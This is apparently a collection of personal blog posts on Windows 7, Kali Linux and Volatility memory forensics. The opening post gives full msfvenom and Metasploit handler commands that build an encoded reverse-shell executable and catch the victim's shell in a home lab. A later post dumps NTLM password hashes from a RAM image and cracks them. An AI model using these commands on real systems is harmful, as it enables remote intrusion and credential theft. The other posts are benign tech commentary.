Windows 7 Hacked @ Kali Linux - msfvenom

This post gives you a step by step way to get shell or command terminal of a victim user on Windows 7 OS from an other PC with a loaded Kali OS.The setup scenario is like this as seen in the screen shots below in a virtual box environment :

KALI LINUX : IP Address eth1 : 192.168.1.7

 Windows 7 Ultimate Machine : IP Address : 192.168.1.8

 Pinging from Kali LInux Machine to Windows 7 Machine

 Pinging from Windows 7 to Kali Linux Machine

msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tools.Now need to go to Kali terminal and execute the following command :

p /windows/meterpreter/reverse_tcp designates the payload we want to embed
LHOST designates the local host
LPORT designates the port we want to listen on
-x designates the template we want to use and the path to it
-e x86/shikata_ga_nai designates the encoder we want to use
-f exe designates we want to create an executable (.exe)
anupam.exe designates the name of the file created

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.7 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/anupam.exe

Click to Enlarge

Followed by the following sets of command :

root@kali:~# file /tmp/anupam.exe

root@kali:~# msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > show options

msf exploit(handler) > set payload windows/shell/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set LHOST 192.168.1.7

msf exploit(handler) > set LPORT 3333

msf exploit(handler) > exploit

 

Now you need to apply your skills to take the file ..anupam.exe in this case to the windows machine.In my case for example,i have placed it on the desktop as seen below :

The moment the file anupam.exe is clicked and executed from the windows machine,we get the shell on the Kali Linux machine as seen below :

Here you have the C:\ prompt from the windows machine :-)

Extracting Username/Passwords from RAM Dump : Volatility Framework makes it Easy

1.  For those of you who have started reading this post coz of the tempting post title claiming extracting username/passwords from a RAM Dump,I must assure you it is possible easily in few steps using Volatility Framework.In the post ahead I have a RAM dump of a Windows 7 OS and I have been able to extract the user names and passwords of these users in three simple steps using Volatility Framework.Well,I will quickly get to the steps with screenshots :

Setup Required

 - Volatility Framework Installed.
[How to Install at http://anupriti.blogspot.in/2015/09/volatility-advanced-memory-forensics.html]

- Taking Ram Dump from Windows
[How to take RAM dump at para 3 of http://anupriti.blogspot.in/2015/09/volatility-command-using-imageinfo-to.html]

Here I am using two commands basically ie hivelist and hashdump

HIVELIST

Hivelist is used to locate the virtual addresses of registry hives in memory, and the full paths to the corresponding hive on disk.

Command Usage

python vol.py --profile=Win7SP0x86 -f /home/cuckoo/Desktop/windows_7_ramdump.raw hivelist

You get a similar output as seen below :

CLICK TO ENLARGE

Note Virtual Address for SYSTEM as highlighted
CLICK TO ENLARGE

Note Virtual Address for SAM as highlighted
CLICK TO ENLARGE

HASHDUMP

Hashdump is used to extract and decrypt cached domain credentials stored in the registry.

Command Usage

To use hashdump, pass the virtual address of the SYSTEM hive as -y and the virtual address of the SAM hive as -s, as shown below:

python vol.py --profile=Win7SP0x86 hashdump -f /home/cuckoo/Desktop/windows_7_ramdump.raw -y 0x8901a360 -s 0x8faff008

Hashdump output seen with user names and NTLM dump
CLICK TO ENLARGE

As we see vide above screen shot we have been able to extract names of users as stalin,VOLA and TILITY with hash of passwords against their names.Now we will decrypt these hashes.

DECRYPTING NTLM hash

Now comes decrypting this hash as we have got vide hashdump above.Hashes can now be cracked using John the Ripper, rainbow tables, etc.Now no need to install these crackers separately.Simply google for online decryptos and you will get the password too.I used this site at http://www.hashkiller.co.uk/ntlm-decrypter.aspx

Screen shots below:

Password extracted is test_1234
CLICK TO ENLARGE

Password extracted is test_123
CLICK TO ENLARGE

Password extracted is test
CLICK TO ENLARGE

So in all two terminal commands running volatility hivelist and hashdump followed by decrypting the hash online will give you the usernames and passwords from the RAM dump.Any queries and questions or advises are most welcome.Thanks

Volatility Framework Command : Using pslist - pstree - psscan to identify process details from mem dump

This post will share an example to run the three volatility terminal commands including pslist, pstree and psscan

Before I proceed ahead,I would assume that you have installed volatility in your Linux system(in my case I am using UBUNTU,Installation explained at my earlier post at http://anupriti.blogspot.in/2015/09/volatility-advanced-memory-forensics.html) and you have a RAM dump of the OS u desire to analyse.In my case here I have taken the RAM dump of a Windows 7 OS as explained here at http://anupriti.blogspot.in/2015/09/volatility-command-using-imageinfo-to.html

Usage as follows :

pslist

The command pslist will be useful for any forensic prelim inquiry to find out the processes being run on the pc at the likely time of incident.The pslist command is used to list the processes of a system and it does not detect hidden or unlinked processes."pslist" module utilizes the same algorithm as the tasklist command that would be executed on the live computer. And also, Windows Task Manager uses the same approach as well.The command "pslist" traverses the list of active process structures that the Windows kernel maintains.The screen shot below shows a task manager activity of a windows PC i am using for test.Subsequently I have taken a fresh dump at this time and then analysed this dump with volatility on UBUNTU to find the process details which actually come out as the same as seen in the screenshots below :

Windows TASK MANAGER as seen in Windows OS
(CLICK TO ENLARGE)

The command usage at terminal syntax goes like this :

vol.py --profile=Win7SP0x86 -f windows_memory.raw pslist

Click on image to ENLARGE

Click on image to ENLARGE

 [TRIM]

Click on image to ENLARGE

 [TRIM]

The columns display the offset, process name, process ID, the parent process ID, number of threads, number of handles, and date/time when the process started. The offset is a virtual address by default, but the physical offset can be obtained with the -P switch as seen in the command below with screenshot.

vol.py --profile=Win7SP0x86 -f windows_memory.raw pslist -P

(Output with -P Switch)
Click on image to ENLARGE

pstree

pstree command is used to view the process listing in tree form and enumerates processes using the same technique as pslist, so it will also not show hidden or unlinked processes. Child process are indicated using indention and periods.SCreen shot of output and syntax as below :

vol.py --profile=Win7SP0x86 -f windows_memory.raw pstree

Click on image to ENLARGE

 psscan

psscan is used to enumerate processes by pool tag scanning and can find processes that previously terminated (inactive) and processes that have been hidden or unlinked by a rootkit. Syntax and screenshot of output as follows:

vol.py --profile=Win7SP0x86 -f win7.dmp psscan

Click on image to ENLARGE

Volatility Command : Using IMAGEINFO to find type of System Image

1.   After installing Volatility as I gave details in my post here,next we need to start exploiting the power of Volatility.In my next posts ahead I would decipher usage of the general commands used for Volatility.To start with I initiate with IMAGEINFO command whose output tells the suggested profile that you should pass as the parameter to --profile=PROFILE; there may be more than one profile suggestion if profiles are closely related. One can figure out which one is more appropriate by checking the "Image Type" field, which is blank for Service Pack 0 and filled in for other Service Packs.

2.  Next few screen-shots show how I have taken the RAM dump of Windows 7 OS with the help of DUMPIT utility that I downloaded from here.Dumpit vastly simplifies memory acquisition. Effectively Dumpit combines win32dd and win64dd into one tool and is so simple to use even a non-technical user could do acquisition from a USB key. The dump can then be analyzed using VOLATILITY.

3.   Firstly,I show u the windows screen here with the Dumpit file on desktop which I simply click one to get the dump.

 I get the following screen and I click YES

 Further yes to the command prompt screen starts the dump download as seen below :

 I get a success message here and the dump is ready for analysis.

 The .raw file that is generated,I move it to ubuntu for analysis which has Volatility installed.At the terminal I type the command as :

python vol.py -f file_name.raw imageinfo

and in a few minutes I get the profile suggested as Win7SP0x86 / Win7SP1x86

Setting up your Virtual Lab : Two Machines for SET

1.  This post will be useful for those looking to setup a virtual lab on their laptops/PCs that can be used to play with Backtrack/Kali Linux like similar images.Here I am sharing exact screen shots of configuration required to set up two machines who would access internet independently and would also at the same time ping each other on a local LAN setup...subsequently can be used to work with SET(Social Engineering Toolkit) as discussed in my last post.I have two machines here with Kali Linux and a Windows 7 machine.

2.  Both have been setup with two NICs each and configured as shown below :

(Windows 7 Machine NIC 1 Setting)

(Windows 7 Machine NIC 2 Setting)

(Kali Machine NIC 1 Setting)

(Kali Machine NIC 2 Setting)

(IPCONFIG output at Windows machine)

(ifconfig output at Kali machine)

(Ping to Windows Machine)

(Ping to Kali Machine)

(Kali Access to Internet)

(Windows Access to Internet)

HIT WICKET & OUT- Microsoft Genuine Patch crashes WINDOWS 7

1.     This is some news from the corridors of Microsoft.A genuine MS patch released for Windows 7.The patch in the dispute is "Microsoft Security Bulletin MS13-036"

2.  Redmond from Microsoft's Security Response blog blamed the glitch on conflicts with third-party software:

We are aware that some of our customers may be experiencing difficulties after applying security update 2823324, which we provided in security bulletin MS13-036 on Tuesday, April 9. We’ve determined that the update, when paired with certain third-party software, can cause system errors. As a precaution, we stopped pushing 2823324 as an update when we began investigating the error reports, and have since removed it from the download centre.

Contrary to some reports, the system errors do not result in any data loss nor affect all Windows customers. However, all customers should follow the guidance that we have provided in KB2839011 to uninstall security update 2823324 if it is already installed.

3.   That means Windows 7 users should uninstall the security patch Microsoft issued on Tuesday because some PCs failed to restart after applying the update.....:-).Microsoft has advised users of Win 7 and Windows Server 2008 R2* to roll-back the patch.

4.   More about the patch here.Thanks http://www.theregister.co.uk/security/

Windows 7 Hacked @ BACKTRACK

(DOUBLE CLICK TO VIEW BETTER)

Nothing new for the active Cyber Sec community...but since I had recently recorded a screen cord I thought like uploading the same for everi one.....This is my second "hands on" a windows machine after I attempted on XP last year at  http://anupriti.blogspot.in/2011/10/backtrack-5-how-to-use.html

NOKIA & MICROSOFT : A MERGER TO READ ABOUT

1.    In todays shrinking world when we hear of merger of giants...its part of normal breaking news which hardly puts together rolling eyeballs 7 pop ups ....But this one is slightly different or if not different it is really BIGGGGGGG.This is about merger of fantabulous phone hardware NOKIA and the operating system giant MICROSOFT coming toether to produce and try beating the phones across?

2.    The deal which was in the rumour rounds already went much ahead of the expectations.....in effect, Nokia is handing over its future - in smartphones at least - to Microsoft and Windows Phone 7.  That means Good bye & Happy journey Symbian . So can the combo really become the third horse in the race, giving Apple and Android a run for their money ?I have my doubts....

3.    Crux of the acquisition pointwise listed below :

- Nokia to embrace Windows Phone as its principal smartphone.

- Nokia to contribute its expertise on hardware design, language support.

- Both would closely collaborate on joint marketing initiatives .

- Bing would power Nokia’s search services(nobodys guess!!!)

- Nokia Maps would be a core part of Microsoft’s mapping services.

4.    Just to mention,a year earlier when this merger was being talked about, was once declared an april fools rumour. And now about a year later it is on official Microsoft site.Thanks Microsoft site for info

Service Packs & Infection Rates

1.  First it was windows XP..then it was SP1(Service Pack 1)...followed by SP2,SP3 ...further by Vista SP1,SP2 and now Windows 7...how the upgrades in these packs have been reducing the infection rates is briefly reflected as per stats from Microsoft Security Intelligence Report.

- Infection rate for windows XP with SP3 is less then half of that for SP2 and less then a third of SP1.

- Windows Vista SP2 has a lower inefction rate then SP1 which is about 50% lower then Windows Vista Basic.

- In case of Server Operating SystemS,the infection rate for windows server 2008 with SP2 is about 20% less then the predecessor ie Windows Server 2008 RTM.

2. Thanks http://www.microsoft.com/security/sir/

MY WINDOWS 7 HOUSE PARTY PACK : THANK YOU MICROSOFT

1. Two months back I had registered to host a house party on the occasion of launch of WINDOWS 7( :-)...the secret known to beta testers) ...the next generation windows OS after answering a few FAQs on Windows 7 without realising that I would end up as a winner of the signature edition of the house party pack including the original Windows 7.I got the confirmation from microsoft two weeks back......still then I had thought of it being some spam mail....till I got the tracker ID from DHL....so since last two weeks have been waiting to get that pack of Windows 7....and finally today I got the pack today......and it looks like this .......grrrrrrrrrrrrrrrrrr8...thanks Microsoft for the dabba.....so happy to use a genuine edition of a Windows OS for the first time!!!!!ha ha ha!!!!that to on my name direct from the US of A.

...thanks Microsoft again....and lets meet u guys at the webinar day after!!!!

WINDOWS 7 : MY FIRST HANDSHAKE-4 - THE SNIPPING TOOL

1. This one is surely going to be one of the most HIT feature of Windows 7.This feature allows users to capture , edit and share information of web and local pictures (images).Snipping allows you to send the capture image/text to anyone using the option listed on the menu options.This allows user to save the selected portion in any of the formats PNG,GIF,JPEG & MHT.

2. To explain it in a simpler way.What we used to earlier till Vista when we wanted a screen shot.Four steps :

- Press print screen

- Go to Paint Brush

- Do paste

- Save in desired format

3. This is now replaced by one click on the snipping tool...all steps done in one click.No print screen,no opening of paint brush,no paste,no saving.So time saved is time gained.

WINDOWS 7 : MY FIRST HANDSHAKE-2

1. Continuing further exploring Windows 7 was a good expereince and has started looking promising to me.

2. Windows explorer : Windows Explorer has also been modified. New commandbar, new left-side pane containing Libraries, Favorites, etc, new Details Pane, a few new options in "View" menu like Content and at last re-sizable Searchbar.

3. Installation did not ask many questions nor did it take much time...may 30-35 minutes...i was on the desktop.

4. Desktop context menu is similar to earlier OS but addends 2 new choioces which are :

a Share with

b. Gadgets

5. Control Panel window has also been redesigned. The left sidebar takes lesser space and resizes itself whenever any control panel item is opened in the window which provides more space.

6. Calculator is a thing that I have left for now for it needs to be worked on with few examples with new features.For now I would just add that PROGRAMMER and STATISTICS are two new menu options that have been added.

7. Outlook Express is not seen till now and has been done away with!!!!

8. More will be added as I explore more!!!!!!!

WINDOWS 7 : MY FIRST HANDSHAKE-1

1. In further exploring Windows 7,few more facts that have come to my knowledge include the following:

2. Minimum configuration :

• GHz processor (32- or 64-bit)

• 1 GB of RAM (32-bit); 2 GB of RAM (64-bit)

• 16 GB of available disk space (32-bit); 20 GB of available disk space (64-bit)

• DirectX 9 graphics device with WDDM 1.0 or higher driver

3. Task bar Classic style is out.

4. Sticky notes is a new permanent feature which was earlier an optional gadget in Vista.Once clicked,it gets a little yellow notepad and one can type short note for own reference and mailing.Pic of sticky note yellow window from my laptop is shown inset.

5. A lot has been put in renovation and refurbhishment of taskbar.The taskbar at the bottom of the screen is what one used to launch and switch programs between them. In Windows 7 one can pin any program to the taskbar so it’s always just a click away, icons can be rearranged just by clicking and dragging. Hovering over the icons will make thumbnails appear of every file or window that is open in that program.But the over all effect is not looking so appealing till now 2 me.

6. Speed for reaching desktop while start and reaching in off mode while shut down is relatively much much faster.

WINDOWS 7 : MY FIRST HANDSHAKE

1. After a long time about 4 months in which I didn't get much time to work on this and after 3 unsucessful attempts...i mean 3 infected downloads....I am finally writing this from the new Beta OS Windows 7......yes the successor to Windows VISTA!!!!!!!

2. Till now I have been able to load the chipset dvr, graphics card driver,office 2007 and one F Secure Antivirus Internet edition for windows 7.No compatability issues and first impression is generally OK till now......one bad thing is shayaad that wondows classic style has been done away with!!!!

3. In a few days more...i will be writing more about whats new and different in Windows 7 when compared to Vista!!!!!!!!